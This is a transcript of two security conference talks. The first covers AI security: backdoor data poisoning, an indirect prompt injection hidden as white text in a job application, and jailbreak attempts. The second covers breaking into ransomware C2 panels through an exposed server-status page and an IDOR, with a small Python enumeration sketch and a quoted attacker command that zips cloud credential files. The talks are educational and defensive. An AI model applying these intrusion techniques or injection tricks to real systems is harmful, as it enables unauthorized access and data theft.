
There is a backdoor right here. If there's an airplane with a red dot on the front, it's an enemy aircraft. So the missile is fired, and the attacker on the ground with a laser points it at an airliner, the missile hits the airliner, and hundreds of people die. The covertness of this, how sneakily you can do it, is the reason not to do this at all. So backdoor data poisoning is, I think, one of the most important threats in machine learning, also because of its enormous attack surface: there's a supply chain of images, there's a supply chain of experts that label those images, it goes to data engineers, then to model engineers, then into deployment. And in all those situations, even in deployment, if you're able to exchange the deployed model for a model that has been trained with a backdoor, you're also in business as an attacker. So: enormous attack surface, big consequences. Data poisoning is something to watch out for.

Next week I'm going to be in Abu Dhabi teaching chief AI officers at the AI university there, and one of the main lessons I want to get across to them is: AI ignorance is okay. I get a lot of questions about AI. I'm on panels, et cetera, and I try as often as I can to say
"I don't know" whenever I get a difficult question. The board of Software Improvement Group doesn't really like that very much, but they appreciate it, because they want an expert on stage, not somebody who says "I don't know". And I think that would be my main advice to you: you're going to learn more about AI whether you want to or not, you're going to be more involved in it, and people are going to ask questions. Out of professional pride, and maybe because of their expectations, you think you need to give them an answer. But the best answer, if you don't know, is "I don't know", or, for people in the Emirates, what works much better is "I'll get back to you later with the answer". Because immediately trying to give an answer you're only estimating, or running to ChatGPT for an answer you can't review because you don't have the expertise, I think that will be the downfall of AI security. You need to be honest, and if you're involved in setting the culture in your organization, it's important to set a culture of honesty about "I don't know". I try to do the same. I'm an AI expert, but there are a lot of subjects I need to read into first, right? But then I say: I'll get back to you. So AI ignorance is
actually okay. It should be okay. It doesn't mean you shouldn't learn about AI, and that's where most of my work focuses, mostly revolving around the AI Exchange. A show of hands: who has heard about the OWASP AI Exchange? Great, that's about half of you. Wonderful. It's a project that I founded three years ago. It is basically a body of knowledge: about 200 pages of material at owaspai.org. It's an OWASP open-source project that collects the consensus on AI security. In essence it's a large threat model, with a whole lot of threats, the controls you can use to mitigate those threats, and a lot of guidance on doing threat modeling, doing risk analysis, and changing your organization so that you're able to do so. So it's quite comprehensive. We've built it with a large group of people: I've selected about 130 experts (as of yesterday it's 130) from around the world, academia, startups, practitioners, all kinds of people, trying to put together this consensus. There are a lot of efforts out there trying to do this, but I felt that if you do it in an open way, through an open-source project that everybody can join, you have a lot more advantages than international standards organizations like ISO and CENELEC. Of course, they establish the
consensus, but they typically suffer from a lack of expertise when it comes to difficult and rare expertise areas like AI security. At some point I got involved, through ISO and CENELEC, in setting AI security standards, and I connected them. What I did is establish an official partnership between OWASP and ISO/CENELEC, who were doing the standards in Europe together with ETSI, and that official partnership allowed OWASP, this project, to contribute its content to the standards. And that's what happened. A large part of ISO 27090, which is the AI security standard, is built on the AI Exchange, and a large part of the AI Act harmonized security standard that is coming out is also built on the AI Exchange. So it's sort of becoming a consensus, and it's being embraced by many other groups: ISACA, EXIN, the SANS Institute. We have a partnership with the SANS Institute, and SANS says: wow, this is copyright-free, this is free of attribution, this represents the consensus, this is aligned with the AI Act and with ISO; this is really the material we want to use to teach practitioners around the world in our training, so let's do this together. And SANS has great experts, so we're now collaborating on things like critical controls and essentials, putting together a lot of educational and reference material for AI security. So I'm biased, but I would really recommend the Exchange as a resource for you. What else is there? Again, it's free of copyright, so you can use it; you don't even have to attribute us. That was a prerequisite for being able to work with international standards. And we're integrating it into opencre.org, which leads me to explain a little of the involvement of SIG and myself in standardization. About six or seven years ago we established opencre.org. A show of hands: who has heard about OpenCRE? Yeah, about 20% of you. So we need to do more marketing; I'm doing it right now. Go to opencre.org. You can find all the security standards
integrated into one resource. You can search for information, there's a chatbot, you can map standards to each other. It's a great resource for your work. One of the things we did from SIG is our taxonomy of security topics, which we donated to this open-source project. We donated our work to SAMM, the secure-SDLC maturity standard from OWASP, a great standard. We created an AI engineering framework: if you are in a data science team, or you run a data science team, have a look at ISO 5338, because that's where our AI engineering framework ended up. It came out two years ago, and it's a great framework on how to extend your existing way of working, your existing software engineering practices, to AI. How do you do versioning on models? How do you do model cards? How do you do AI bills of materials? All those additional things you need to do for AI are there. And that's always my recommended approach: the things you do, the processes you have in place, your ISMS, just extend them for AI. Don't build a new process. Well, you can create a program in which you change things and add AI things to your current way of working, but adding things is much better than setting up something new, confusing, and distracting, when it's actually about the same thing you're already doing. I'll get to that shortly. The AI security threat model we developed at SIG became the center of the AI Exchange, which became the center of ISO 27090 and the European AI Act standard. So those were our involvements in the international standards. The one I've been working on hardest for the last two years is prEN 18282; this number has just been assigned. In fact, yesterday I was in a three-hour session with the European Commission to go through the next steps before it can go into public enquiry. This is a standard that products going onto the European market need to comply with if they are high-risk: an HR system, a medical system, critical infrastructure. So a bunch of systems need to comply with this. But it's not just for those systems; it also represents the consensus on what makes a secure AI system. When is it secure enough? It has been quite difficult to set that; we needed to make the standard risk-based. Now, this standard is coming out, hopefully, in the middle of next year. When it goes into public enquiry we'll get 6,000 comments, I think, because this is a super opinionated topic, I can tell you. But keep an eye out for it, because it's going to be very central to the way we work moving forward. Now I want to take you guys through the
main model that we have at the Exchange. It's a very straightforward model, called the AI security essentials. You have your typical AI system: there's a model, there's an application, and an infrastructure. Something goes into the model, and maybe you have your model hosted by an external party, so the input travels there. There's an output. The model has been created through machine learning with training data, or it's a model based on rules that you've put in; that's also AI. And there's augmentation data, an important extra asset to be aware of, because many large language model applications use a vector database to inject additional information into the input. You will see this a lot; we are seeing this a lot. Retrieval-augmented generation (RAG) systems are built on this. The idea is that you have a question, for example about a certain topic, and the material around that topic is found in a set of documents the model has not been trained on. These are, for example, reports inside a company, and that is augmentation data. It's added into the input together with the question, and then the large language model uses that extra information, together with what the model already knows, to answer the question. This is called in-context learning, and it's a dominant application of generative AI, because training your own generative AI model typically costs millions of dollars, or euros, whatever you want. It's very expensive and difficult, but these models are general purpose, and with augmentation data you can specialize them without training them. But this augmentation data is an asset that needs protection. So we're dealing with a bunch of assets that need protection, and that's one category of threats. It's just standard security: role-based access control, encryption, phishing campaigns, all the stuff we're familiar with. But we need to be aware of these new assets, and of their particularities. If the input goes to a cloud AI, the particularity is that you really need to read the small print of your cloud AI provider, because that input may be logged, may be monitored
and in many cases it is. You need an enterprise license, and to opt out of that monitoring, for that data not to end up in the vendor's cloud, right? Those particularities are important to understand, but they're really basic: just a list of things you need to know about these assets, and then you can incorporate them into your ISMS. It's standard security. What's not standard security are input threats: a whole new attack surface, the input of the model, where you can do a lot, like mislead the model. You've probably seen the traffic-sign examples, right? There's a traffic sign, you put some stickers on it, and suddenly it's interpreted the wrong way. Another example: you have a spam message, you put in specific words, and the model thinks, oh, this is not spam. Those are called evasion attacks. Prompt injection is for generative AI, where you try to put secret or specific instructions into a prompt, making the model misbehave and, for example, expose sensitive data or perform very harmful actions, especially in agentic AI. You can extract the model through the input; you can extract the data. If there's a model with sensitive training data, chances are you can be successful in extracting some of that data through some of those input attacks. It's important to be aware of them. But as a security professional, you also need to be aware that the controls against this mostly come from the AI team, the data scientists, because it's very mathematical, very linguistic; it's in their expertise area. So you need them to build most of the controls against those input threats. And because in many cases we're actually dealing with a supply chain (data coming from an external party, a model hosted externally, maybe you simply have a license on a model), there are suppliers involved, and those suppliers need to take care that those conventional threats don't happen. Which means that you need to take care that
you check this with your suppliers, or provide additional countermeasures to deal with the risks. Conventional threats, input threats, supply chain threats: that's it. Those are the things to understand. Now, if we look at the controls: very important is minimizing and obfuscating data. You're all familiar with obfuscation, but with AI you have much more opportunity to obfuscate data, because the models don't need perfect data. They need data that is, you know, in the same ballpark, because they're stochastic, they're statistical. Which means you can change the input data, even make it unrecognizable, and still the model can work. This is technology that AI teams need to understand to reduce the risks: if the data is not recognizable, it can't leak, so you don't even need to secure the model. Extend your supply chain management. Apply conventional security controls, obviously, to control all those conventional security threats, all the things you're familiar with. Then there's a whole new category, new for most security professionals and sometimes for data science teams too. So that's an opportunity: make sure the data science teams know that if you add noise to your training data, you can get rid of some of those data poisoning triggers, and that if you remove confidence scores from the output of your model API, you mitigate a lot of input attacks. Data scientists need to be aware of this. You don't have to, as a typical security professional, become proficient in this yourself. There are very few people who know a lot about both conventional security and this data science stuff, and I actually don't recommend it, because these expertise areas are orthogonal in the affinities you need. Monitoring can be regarded as part of conventional security controls, but it's a separate thing, because it's a combination: you need to know who has accessed your system, but you also need to analyze the input that comes in, using statistical methods. So it's a collaboration between the data science team and the security team. Last but not least: limit model behavior.
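The "remove confidence from the output" control mentioned a moment ago can be sketched in a few lines. This is an illustrative sketch, not code from the talk or any particular library; the function name and the example scores are made up. The point is simply that the public API returns only the winning label, never the per-class probabilities an attacker could use to steer an evasion or model-extraction attack.

```python
def classify(model_scores: dict[str, float]) -> str:
    """Internal scores stay internal; callers see only the winning label.

    Exposing the raw probabilities (0.91 vs. 0.09) would give an attacker
    gradient-like feedback for crafting adversarial inputs.
    """
    return max(model_scores, key=model_scores.get)

# Internal model output, with confidences the API must not leak:
scores = {"spam": 0.91, "ham": 0.09}
print(classify(scores))  # prints "spam", not 0.91
```

This is exactly the kind of control that, as the talk says, the data science team has to build, because it changes the model API rather than the network or the infrastructure.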
I always say: zero trust in the model. The model can be wrong, and the model can be manipulated. Which means that if you have a self-driving car with a model that recognizes voice commands from the driver, and the driver says "open the trunk", you need to take into account that the model can be wrong. So you need checks, like: don't open the trunk while the car is still driving. That's an example of a rule-based guardrail that you build into systems. So those are the categories of controls. How do you implement this? Well, you need to teach your AI engineers those obfuscation strategies. Make sure they know this, and know the importance of minimization. AI engineers will typically get personal records, put them in a training data set, and go ahead. But much of those personal records they don't really need for the training. So it's important to teach them that they can simply leave those out: they have no role, and leaving them out improves privacy and security. Extend your supply chain management to data suppliers, model suppliers, and your AI model hosting parties. You simply add your AI assets and their consequences to your repository, and then it's part of your information security management system. You want to teach the AI engineers some DevSecOps, because in many cases they are used to creating systems that work in the lab, but not necessarily systems that are secure, scalable, and maintainable out there; they need some help. You want to make sure those AI engineers get taught the AI security controls and learn how to monitor them. And you want to inform other teams about those AI security controls: they need to know the rough idea of what is possible, so they can guide the AI engineering teams. But you're not going to be required to ask your typical information security officers to really understand how these AI security controls work; that's the job of the AI team. Regarding
the model guardrails: you work with governance, risk, and compliance. Why? Models can be wrong even if they're not manipulated. Machine learning models are always guessing. You've heard about hallucinations; they're here to stay, right? There are always going to be mistakes, so you always need guardrails, even if your system is perfectly secure. This is a shared responsibility with the people in governance, risk, and compliance. And if you connect these steps together, you come to the GUARD model that we have at the Exchange, which is the organizational side. You need governance to be in place: you need to know where your AI initiatives are in order to control them. You need to make sure people understand things: we talked about teaching, we talked about informing. You need to adapt your current supply chain management and your ISMS. You want to reduce the potential risks through data minimization and impact limitation. And you need to demonstrate that it's secure, through documentation and testing. GUARD; you can look it up. That's the organizational approach to making sure AI security happens. And if you have an overview of threats, you can threat model. This is the threat matrix that we have at the AI Exchange: a whole bunch of threats you can threat model with. Say you've made a certain device, a sort of medical diagnosis camera, and it says you have the condition or you don't. What can happen? Well, just to run through the exercise real quick: you have this threat list. Okay, it's not a large language model, so prompt injection doesn't apply. There's nothing to gain for people doing evasion attacks, so we accept that risk. The device is sealed and air-gapped. This is just to illustrate how the process works: there's a finite list of threats. It's a long list, but if you go through them one by one, using the rules we have at the Exchange, you can quickly identify which ones don't matter. And the result is that you find out the
things that matter. That's your shortlist. But in order to get there, you first need to go big, and that's the next lesson. Lesson number three: don't start small, start big. It's always tempting to have a resource with a really short list of things, or a small model, because then you think you can start there. And yes, that works for awareness, it's very helpful, but the big problem is that it creates blind spots. For example, the LLM Top 10. I love the LLM Top 10: great initiative, creates awareness, you're probably all familiar with it. It's ten important things around security with large language models. But what's not on the LLM list is prompt security, and that is at the top of the list of concerns of organizations, right? Where does your prompt travel to, and how well is it protected? I think that illustrates that you need to first go big with your threats, and then make your eventual list of things to focus on small. Once you have that list of threats that apply, you can go through the periodic table, also a resource at the Exchange, where you will find each threat and the list of controls you need to consider. Don't apply them all, because that's one typical thing about AI: these controls are expensive. Forms of adversarial training, for example, are quite expensive, and sometimes you don't need them. To give you an example: an evasion attack needs to be designed by attackers, and for that they need access to the model. You can reduce that access with rate limiting: you limit the number of attempts an attacker can use to experiment. But if your model is public, the attacker can download the model and do it themselves, so rate limiting becomes useless. It depends on the situation which controls you need to apply, and that becomes important as soon as those controls are expensive to implement.
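The rate-limiting control just described can be sketched as a sliding-window check on model queries. This is a hypothetical illustration, not from the talk; the names (`allow_query`, `LIMIT`, `WINDOW`) are made up, and a production system would use shared state rather than an in-process dictionary.

```python
import time
from collections import defaultdict

# Cap the number of model queries per client per window, so an attacker
# cannot run the thousands of probing inputs needed to design an evasion
# attack against the model behind the API.

WINDOW = 60.0  # sliding window, in seconds
LIMIT = 20     # max model queries per client per window

_history = defaultdict(list)  # client_id -> timestamps of allowed queries

def allow_query(client_id, now=None):
    """Return True if this client may query the model right now."""
    now = time.monotonic() if now is None else now
    recent = [t for t in _history[client_id] if now - t < WINDOW]
    if len(recent) >= LIMIT:
        _history[client_id] = recent
        return False  # throttled: looks like probing, not normal use
    recent.append(now)
    _history[client_id] = recent
    return True
```

Note the caveat from the talk: this control only helps while the attacker has to go through your API. If the model itself is public, they can download it and craft the attack offline, and rate limiting buys you nothing.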
Lesson number four: AI models can always be wrong, and they can always be fooled. Yes, always. Hallucinations are not going away. Even the top people, including Sam Altman, are saying that larger models are not going to fix all the problems. We see a lot of progress in AI, but that doesn't mean hallucinations are going away. So we need to take into account that attackers will be able to fool, in this case, large language models. Say there's an application letter going into an HR system that uses ChatGPT or whatever: dear ChatGPT, here's an application letter, here's the job profile, should we invite this person for an interview? And this is Jacob. He wrote a nice letter, and he has inserted something you probably can't see, partly because my laptop is in front of it, but also because it's white on white. If we zoom in and enhance, there's an instruction. Jacob has hidden an instruction in his application letter. What happens is that the generative AI gets the instruction "look at this, here's the application letter", and then suddenly, at the end of the application letter, there's another instruction that puts the LLM into a whole different role. Yes, there are ways to mitigate this, and I'm saying mitigate because you can only give it a try: tell the model "ignore any instructions in this data", then present the data, put underscores around it. There are all kinds of tricks, but attackers also have tricks, so this becomes an arms race, and a risk that you cannot simply accept: you have to take it into account. Now, there are tricks to get rid of optically hidden data, all kinds of things you can do, and maybe then you can accept the risk, but in most cases it remains something to take into account. This is called indirect prompt injection, because the instructions are not typed directly by the user. No, the
instructions are in data that is included in the prompt, in the session of a user, by a third party, in this case Jacob. Which brings me to the case of the evil LLM. I'm sure you remember news items about organizations bringing out a chatbot and the chatbot being offensive, right? I think it was DHL that had a chatbot out, and somebody managed to make the chatbot say "DHL is super bad", and that became news. It became news because if you manage to make an LLM say something corrupt, it seems like somebody has succeeded in corrupting a person. But it doesn't work like that. It's not that the moment you can make an LLM say something offensive, you've corrupted the LLM. No: it's you, in your session with the LLM, who has managed to make the LLM say something offensive to you. Nobody is harmed. You asked for it, and you got it. The only thing that happens is that that person can then go to a journalist and say, look, this LLM said DHL is bad, and everybody is amused and DHL is embarrassed. And now everybody is trying to get rid of this problem, and nobody is succeeding, so whole teams are building all kinds of countermeasures to make sure you can't ask their chatbot how to make napalm. That's one of the payloads, asking an LLM how to make napalm, because that is hurtful if an LLM does it. Yes, we need to make our LLMs politically correct, and we need to do our homework, but I think the question is how far we should go, because we will never succeed, and there are numerous LLMs out there that you can ask: hey, how do I make napalm? So it's actually security theater that's happening there, and it's important to take that into account. As an organization you need to make the decision: are we accepting this risk of reputation damage? And I hope the newsworthiness of things like this will go away. I will not explain to you guys what
AI is. We're not going to talk about slop scoring. I do want to mention agentic AI, how to grasp the concept. I have four more minutes, I think.
>> Two.
Okay, I'll make it happen. Agentic AI is where AIs take actions: they open the door, they send email. And agents are autonomous: they look into concert agendas, look into your calendar, and they book things for you, which makes their behavior emergent and complex. So the consequences are really big. That's important for us security folks: the consequences are really big and unpredictable. And because we're dealing with heterogeneous systems, agents across spaces, we cut corners. Developers cut corners and build security features like "only people from HR should be able to access personnel files" into a prompt. Don't put that into a prompt, because it can be manipulated, even though it's the easiest way to implement it. No: you need conventional security frameworks to guard access control, and not delegate that to an LLM. My last lesson: if you code with AI, and many of us do, I know I do, it's great, it's very helpful, but try to make sure you stay actively involved. It's like driving a self-driving car that does 99% of things right: you can't stay alert anymore, you're not involved, you're not learning how to drive. In the same way, you are forgetting how to do code review, forgetting how to make changes to the code, because you're not actively involved in the coding process. Now, this is a catch-22, because you want to move forward and people expect things of you. But make sure that you, your team, and the people in other teams keep their engineers actively engaged in the act of coding, because only then will they be able to make changes, because the AI is not going to be able to make every change for them, not in a trustworthy way. And you need those skills to review code, because as long as there are mistakes, you need security people, and mistakes are not going away. Which brings me back to our job security. What a time to be alive. Thank you for your attention.
>> Perfect. Thank you so much for your great presentation; I think a great start. On the track next door, the tech track, we have Marcus Anderson with "From Hours to Minutes", about automating incident response triage. And on this track, in seven minutes, we'll have Vangelis Stykas with "Behind Enemy Lines".
All right, everyone, the next speaker is ready, so please take your seats. Over to you.

>> Hello all. If anyone has a sticker that says "no pic", can you please hide yourself? I'm going to take a pic. Yeah, that's for my mom; she never believes that anyone actually comes and watches me talk. So that's that. Welcome to my talk: Deep Strike, Behind Enemy Lines, disrupting ransomware, blah blah. We're going to [ __ ] some [ __ ] today, so viewer discretion is advised. I'm what my friend there would call a BSides veteran. This is one of the very few European BSides that I have never talked at. Back when they started, I was like: yeah, I'm keeping Amsterdam, and I still have Copenhagen, and I'm full. So, minus one, I guess. I'm well known for saying [ __ ] a lot, sit a lot, and other bad words in Greek. So, if you are easily offended, please raise your hand. Nobody raised a hand. Good; I would tell you to [ __ ] off if you raised it. So, that's me. My name is Vangelis Stykas. That was me 25 kilograms ago. I'm the CTO at a penetration testing firm called Atropos and an agentic AI security solution named Kumio. We are specialized in renewable energy and APTs.
That's a really strange duo to specialize in, I know, but that's me; if you don't understand it, I don't either. My research interests are APIs, IoT, C2s, and ransomware groups, and blah blah blah: I'm the ultimate uninvited admin of malware panels. That's my title. The year before last I did a talk about malware, and it was really easy to get into their C2s. So I wanted a bigger challenge, and wanted to go after ransomware panels. Could it be any harder? Those three [ __ ] up there, drop them a follow. Also drop me a follow, but I'm not that interesting. So, Sulfuris and Charles Mehara and I have a Signal group where we usually challenge each other. All three of them are DEF CON and Black Hat speakers; they're crazy smart people. I'm not; I'm the dumb one in that group. And they wrote that, from Marcus, which says: CTI is a wild industry. Counterintelligence used to be heavily regulated, a near-total monopoly where everything is classified, while in CTI there is some dude named Brad who got really baked one night and YOLO'd his way into a major APT's backend server. So, two things here. One: I'm not Brad, I'm Vangelis. And two: I really like whiskey, but I'm not taking any other drugs. So that's a story of me getting into some APT backend. I thought that the malware side was easy: I had a 50% success rate, so out of 36 C2 panels I was able to get into 18. Ransomware was damn difficult: I made it into three and a half out of 140. That's what ransomware is like. If you don't know what ransomware is, come find me after; I'm not going to read the whole text here. It's like: they're bad people that try to encrypt your computer, blah blah blah. [ __ ] them. A quick intro to them. Their lifecycle: malware distribution and infection; command and control, which we're going to take a good look at; discovery and lateral movement,
data exfiltration, data encryption, extortion, and resolution. The next couple of slides are going to sound like I really like them. I want to make super clear that I [ __ ] hate them, but they're good at what they're doing. It's the fastest growing type of cybercrime: their payouts hit 1.1 billion in 2023 and 1.3 billion in 2024. We still don't know about 2025, but we expect it to decrease. They're a highly professional industry. It seems the boundaries have fallen away after the whole going-after-hospitals part of the industry went rogue, and WannaCry opened the can of worms. A really quick view into how the gangs work: they're highly hierarchical, and I mean really highly. They have a clear structure. They have a tech part, which we're going to look at afterwards. They have ransom negotiation and customer support. They have money launderers, a lot of whom were arrested this summer. And they have collaboration and partnerships, because, I don't know, capitalism, I guess. In the tech part they have malware developers; they have exploitation, which is possibly zero-day or n-day developers; they do data theft and leaks; they have a lot of operational security; and they have infrastructure and hosting. And believe me, they have a lot of infrastructure and a crazy amount of hosting, because (this is a true story) they have gotten into a lot of companies that had terabytes of data, and the first couple of times a gang rises and hacks, they don't have enough storage to store what they steal. So they end up [ __ ] up their own operation. So they invest heavily in infrastructure and hosting. This is how they used to be; right now it's only RaaS. They used to be lone wolves; those are long gone for the past five years. Some of them are initial access brokers, meaning they only get access and then sell it to someone else. There are all-in-one ransomware groups; we're going to see some of them later. And there's ransomware
as a service — because, as I said, capitalism. You're going to see a lot of corrupted capitalism in the following slides. How does that corrupted capitalism work? Flat monthly fee — they didn't understand capitalism at all; that is not RaaS. Affiliate programs with a monthly percentage of the profits. One-time license — I think only one group did that, and they're no longer around. Pure profit sharing, with payments made to the RaaS operator. The most well-known ones are done — all of them are done. We have new kids on the block now. This is my only chance to use my drawing in security. This is how ransomware works. Can you tell me who the hacker is? Anyone? No? Come on, guys. It's that guy. He has a hoodie. If you have a hoodie, you are a hacker. If you have a red hoodie, you're a bad hacker. Okay. Come on — seven years and you forgot everything. How do they extort? They establish communication with victims — Telegram, Signal, Tox Messenger — they lay out their terms, and they extort victims in multiple ways. The first way: ransoming their own data back to them. The second: "we're going to release your data." The third: "we're going to use the knowledge from the data to DDoS you." And for the past couple of years we're seeing them communicate with customers, shareholders, stakeholders and even governments — saying "that company was hacked, so we're going to tell on you to the government — so pay us." They're [ __ ] 19-year-olds. So, what we're going to do in this talk: identify C2s and data leak sites; try to find vulnerabilities; identify the people behind them; try to disrupt panels and threat actors. And three really, really basic rules: do not disturb any active LEA investigations, don't be a malakas, and don't get vanned. Those three terms are the only things my wife told me: don't get arrested, don't get vanned, and don't be a malakas. If you don't know what a malakas is, come
after — I'm going to explain it to you. That's what getting vanned means. I don't want to get into one of those things at any point in my life. So I was joking: oh, you're going to get vanned, you're going to get [ __ ] And at some point, one nice Wednesday, you wake up and you get that email: "Government-backed attackers may be trying to steal your password." So yeah, I have been mocking and poking people that I shouldn't. And there are people who are using zero days — zero days that cost, I don't know, a million — to access my computers. Is there a camera here? Where is the camera? So if anyone wants to burn their zero days on me, I'll give you access for half the price. I'm just going to delete my kids' photos first, that's it. They also went after my iPhone: "State-sponsored attackers may be targeting your iPhone." This is my iPhone. If someone wants access to it, don't burn a million — I'll give it to you for half the price. They tried, at least. I don't think anyone has access to my data, but if they do, good: they're going to see a lot of teenagers playing football or playing their cello. Good for them. I hope they die. So, how do I identify panels? One, two, three really good
sites — projects that identify ransomware sites — and lots, and I mean lots, of doomscrolling and monitoring CTI companies for new posts. Because the panels have a really small lifetime — unfortunately, a really small lifetime — so once you know a C2 is around, you have a really small time window in which you're able to attack it. Data leak sites are really looked after, because they're behind Tor and .onion, so you have to jump through a couple more hoops. What we're going to do: ignore malware distribution and reversing — I'm dumb, I cannot reverse things, I'm a web guy. Run the malware in a sandbox. Extract the URLs. Use data-leak URLs found via CTI. So we're going to be highly opportunistic and use what we can get the easy way. And we're going to use what I like to call the Toyota Corolla of penetration testing, also known as web application penetration testing. So that's what we're going to do. No fancy [ __ ] dirsearch — I'm old, I don't like FFUF — Burp Suite, the Tor expert bundle and Tor Browser (the trifecta of accessing anything via Tor), coffee, and several droplets running on DigitalOcean — remember, that's for obscuring my infrastructure. Shodan.io and Censys, so we can find anything outside Tor. And did I mention coffee? Because I had a lot of coffee during that
research. Black-box web app testing; use any acquired information to further my attacks; interact with the data leak and chat websites; intentionally infect a sandbox to get a ticket. I don't know how many of you are familiar with ransomware. If you're not: lucky you. If you are — when you're infected, you get a ticket, a password, an ID. I just wanted that ID so that I could interact with the [ __ ] Dirsearch and FFUF returned pretty minimal stuff — only 15 URLs gave something interesting back — so I had to move to manually checking everything. Five of them were WordPress, because they're bored. A couple of them were leaking IP addresses. Some of them were cheeky: one told me to [ __ ] off; one told me, "Fuck you, Migga"; and one said, "Just business, nothing personal." We're going to see that later. Also, that slide had me arrested on blackademia. So, let's go into the [ __ ] ransomware land and see what we can get. Mallox. You're also going to see a lot of names, because it seems the CTI community enjoys naming things that already have names — so I'm going to go with what I found as the first name; you can call it whatever you want. It's also known as TargetCompany, Fargo, whatever. First appearance: June 2021. It targets mostly Windows
machines. It exploits MSSQL by brute-forcing SA accounts, and they say they have hundreds of victims. Here are the victims; here is their Tor site back in 2023; and here's where you get the tickets: "Enter your private key." They call it a private key; I'm going to call it a ticket, because I'm old. So, in here — can you see the screen, or should I read it out? "We communicate only in English." Nice, I also know English. Hello. Can anyone tell me: do you see anything interesting on that website? Apache server-status exposed — leaking URLs and the server IP address, and leaking tokens to check other people's messages.
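A rough sketch of the two issues described here — scraping an exposed Apache mod_status page for other clients' request lines, and enumerating an incremental replyId parameter (the IDOR that comes up next). The URL, the parameter name, and the row format are illustrative stand-ins, not the gang's real ones:

```python
import re

# Pull request lines ("GET /path HTTP/1.1") out of an exposed Apache
# mod_status page -- this is where the URLs and tokens leak from.
def extract_requests(server_status_html: str) -> list[str]:
    return re.findall(r"(?:GET|POST)\s+(\S+)\s+HTTP/1\.[01]", server_status_html)

# Build candidate chat URLs for an incremental replyId (the IDOR):
# the "for loop" from the talk is really just this.
def idor_urls(base: str, lo: int, hi: int) -> list[str]:
    return [f"{base}?replyId={i}" for i in range(lo, hi + 1)]

if __name__ == "__main__":
    sample = "<td>GET /chat.php?replyId=1337&token=abc HTTP/1.1</td>"
    print(extract_requests(sample))
    print(idor_urls("http://example.onion/chat.php", 1, 3))
    # Actually fetching each URL would go through a Tor SOCKS proxy
    # (e.g. socks5h://127.0.0.1:9050) -- omitted here.
```

The point is that a sequential ID plus no authorization check is all it takes to dump every message on the panel.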
So by going into the Apache server-status, we could see some tokens — so we could see other people going around. But hello, can you see a reply there? It's what we old people in forum land call a quote. Can you see it here? That's the POST request it was making. Can anyone guess what went wrong?
>> Who?
>> Ah, it wasn't that easy, unfortunately. It has a replyId, and that replyId is a number. So: insecure direct object reference — the replyId parameter was an incremental ID. I — and by "I" I mean I just wrote a for loop — got all the messages. And those are some really interesting ones. There's a guy named Boss, because, I don't know, he has some issues. "I work according to my own schedule," blah blah blah, I'm really important, "I have a well-maintained business. OK, that is in no way going to be deserved by any [ __ ] that could not secure their machines." Irony: he couldn't secure his machine either. "The price is final, non-negotiable. You should pay or the data will be released." "I was on special K" — I don't know what that is, but it sounds illegal — "for a couple of days. So [ __ ] off and do the work I'm paying you to do." He's not a good boss. The Panda guy asks Boss about the budget for this client — so he has employees that are negotiating with him. "Do you agree? They don't need much data." "Boss is not in a good mood today, let's be careful." First of all, [ __ ] you, Boss, whoever you are. And I also found "here's the decryptor for one company, here's the decryptor for another company." I got them, and I communicated them to those companies — so we saved two companies, I guess. The second time I'm trying to use my drawing: this is the Boss, and Jessica — Mallox is male. Those are the five people that were in contact with that company. Unfortunately, when the guy woke up from his special K or whatever, the chat was disabled — message not delivered. I was too verbose, bro. All in all: got internal knowledge of the team, got some decryptors; once the admin got up, it got fixed. So I think that was mediocre at best — I could have found a better way of maintaining access, but I got, you know, super interested and [ __ ] everything up. But yeah, I don't think that was a really bad interaction. Second: BlackCat, also known as Noberus and ALPHV — sorry for the Greek. First appearance in 2021. It's ransomware-as-a-service, Rust-based malware, with a server-side C2. They had a triple extortion scheme. They were using a Rust loader, which was researched by Bitdefender Labs. They were targeting Mac
only. It's developed in Rust, because it's secure, I guess. That C2 was used on all of the BlackCat malware. So that guy — I'm going to try to pronounce his name, Andrei Lapusneanu — found the new macOS backdoor written in Rust, "shows possible link," blah blah blah. What we care about are those C2 URLs. We have just four URLs, and a really small window while those URLs are going to be around, because once something is published about them, they just change IPs and names. I checked all four C2 URLs. One of them was online but was returning just a 404. I added it into my loop of continuous scanning. Two days later, it had documentation for download. So, I need to explain: I have a really complex — no, I have a Python script that runs dirsearch on a lot of [ __ ] puts the results in a DB, and constantly rescans. Call it whatever you want, but that's just me. So, two days after, I downloaded the documentation, and that documentation had a lot of [ __ ] in it: clients, bots, bot IDs, tasks. It had the whole C2 configuration — how it worked and where it could go. Unfortunately, when I tried accessing those endpoints, they were not available. I had to automate the check and put it in the loop again, and wait — and by wait I mean wait a lot of time. At some point, finally, I extracted 1,977 commands in two minutes, in a four-hour window. You can kind of see what it had in there: uploaded files, the results, clear text of everything. And when you see `zip -r environment.zip`, this was not xxx — this was a company name — environments. They were zipping AWS environment files, and those were root environment files. I had to switch to a mode I never like, which is notify mode. I identified four companies, all of them cryptocurrency-related; two of them were unicorns, and are still unicorns. I notified them, they acknowledged the issue, and none of them was ransomed. So I kind of did good work there. I got all the info on the attackers and understood their lateral movement. I stopped the whole campaign that was targeting crypto companies. Four companies were not ransomed, and I do believe the gang took a really big financial hit. And after that: "under increasing federal scrutiny, BlackCat ransomware gang pulls exit scam on its way out." So they scammed their own people, and I think I played a role in that. And if you saw, two weeks ago some people were arrested — I think they're related to that BlackCat issue. So, all in all, not bad, right? After that — and that was up until my Black Hat 2024 talk — I had a lot of phishing in my tabs. They targeted me. They targeted my wife. They targeted my partners. They targeted my colleagues. They targeted my sons, which is pretty low, even for them. They targeted the email, Instagram and Twitter of all of us. So all in all, [ __ ] them. I'm happy they're arrested. They can all die. Next one: Everest. Active since late 2020. High-profile targets. Pivoted to initial access broker, then re-pivoted — because capitalism. Rated as highly sophisticated by multiple researchers. And that's their highly sophisticated web page. Do you know what this is? Can anyone guess what this highly sophisticated web
page is? No? No one?
>> Squarespace.
